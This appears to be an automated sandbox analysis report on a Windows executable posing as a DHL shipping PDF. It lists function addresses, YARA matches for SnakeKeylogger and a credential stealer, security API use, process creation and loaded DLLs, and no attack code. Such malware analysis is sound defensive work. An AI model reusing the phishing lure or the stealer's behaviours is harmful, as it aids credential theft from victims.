Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_0544DC12
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_0544DC20
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_0544E4C0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_0544E4D0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_0544BC80
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_0544048A
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_05449C90
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054404983_2_05440498
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_05442F483_2_05442F48
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544AF683_2_0544AF68
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544AF783_2_0544AF78
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_05442F383_2_05442F38
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054437E83_2_054437E8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054437F83_2_054437F8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_05449E183_2_05449E18
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544F6203_2_0544F620
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544F6303_2_0544F630
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544A6C83_2_0544A6C8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544D6823_2_0544D682
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544D6903_2_0544D690
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544A6B93_2_0544A6B9
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544C97A3_2_0544C97A
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544E91E3_2_0544E91E
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544E9283_2_0544E928
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544F1C83_2_0544F1C8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544F1D83_2_0544F1D8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544118F3_2_0544118F
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544C9883_2_0544C988
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054411A03_2_054411A0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054400403_2_05440040
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544E0683_2_0544E068
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544E0783_2_0544E078
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054400063_2_05440006
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544B8183_2_0544B818
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544B8283_2_0544B828
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544C0CA3_2_0544C0CA
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054408DF3_2_054408DF
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544C0D83_2_0544C0D8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054408F03_2_054408F0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054440983_2_05444098
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054440A83_2_054440A8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_05441B4A3_2_05441B4A
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544AB103_2_0544AB10
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544AB203_2_0544AB20
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544B3C13_2_0544B3C1
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544B3D03_2_0544B3D0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054433923_2_05443392
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054433A03_2_054433A0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544A2613_2_0544A261
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544A2703_2_0544A270
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544FA783_2_0544FA78
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544D22A3_2_0544D22A
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544D2383_2_0544D238
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_05442AE03_2_05442AE0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_05442AF03_2_05442AF0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544FA883_2_0544FA88
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2137131687.0000000008AB0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCloudServices.exe< vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2124944282.0000000002B51000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCloudServices.exe< vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2124944282.0000000002B90000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTL.dll" vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCloudServices.exe< vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000000.2110501835.0000000000846000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameNKUn.exe" vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2136107541.00000000055C0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTL.dll" vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2123309741.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4568835958.0000000000F87000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4568374575.000000000041A000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCloudServices.exe< vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Binary or memory string: OriginalFilenameNKUn.exe" vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000003.00000002.4568374575.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6716, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 4552, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, UltraSpeed.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, COVIDPickers.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.raw.unpack, UltraSpeed.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.raw.unpack, COVIDPickers.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, iZZiMmYtgNbupTaoiP.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, iZZiMmYtgNbupTaoiP.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, SXeNjVTESUiPlIoGVN.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, SXeNjVTESUiPlIoGVN.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, SXeNjVTESUiPlIoGVN.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, SXeNjVTESUiPlIoGVN.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, SXeNjVTESUiPlIoGVN.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, SXeNjVTESUiPlIoGVN.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, iZZiMmYtgNbupTaoiP.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, iZZiMmYtgNbupTaoiP.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, iZZiMmYtgNbupTaoiP.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, iZZiMmYtgNbupTaoiP.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, SXeNjVTESUiPlIoGVN.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, SXeNjVTESUiPlIoGVN.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, SXeNjVTESUiPlIoGVN.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.log
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Mutant created: NULL
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002FDD000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4572937327.0000000003F0D000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002FCE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Virustotal: Detection: 31%
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | ReversingLabs: Detection: 26%
                  Source: unknown | Process created: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Process created: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Process created: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: mscoree.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: version.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: dwrite.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: textshaping.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: windowscodecs.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: gpapi.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: iconcodecservice.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: mscoree.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: version.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: wldp.dll
